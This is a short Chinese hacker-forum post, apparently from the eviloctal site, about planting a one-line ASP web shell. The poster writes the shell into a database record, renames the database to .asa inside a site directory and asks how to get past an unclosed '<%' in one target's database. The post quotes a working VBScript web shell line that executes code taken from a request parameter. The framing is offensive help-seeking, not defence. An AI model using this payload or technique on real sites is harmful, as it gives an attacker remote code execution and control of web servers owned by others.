[讨论]网站后台通过数据库提权的问题
议题作者:七星信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
给一个数据库里加了一条记录,里面写上一句话的马,然后把它后缀改为.asa放到站点目录里,用一句话客户端连接这个ASA的数据库,小马成功写入
但我后来下载了一个投票系统,用它试的时候提示我<%没闭合,我怀疑是做了什么防下载处理,有没有人可以告诉我,遇到这种情况怎么样可以让他执行插入的那句代码,我在他数据库里找遍了,没什么字段或者记录里含有"<%",后来用记事本打开这个asa,发现在username和password之间的乱码当中有个"<%",这个直接导致了未闭合的符号,怎么样在数据库中找到插入的这个符号,然后加入记录"%>"把他闭合了,我想只要把他闭合了应该就可以成功了吧
我看有篇文章提到这个问题了,而有个回帖说是加入这句就可以了 <script language="vbscript" runat=server>execute(request("#"))</script>
我看这句话的效果跟一句话木马的效果一样啊,而且这个问题又不是说因为过滤了<%而提交不成功,而是因为里面有未闭合的<%而不成功的
页:
[1]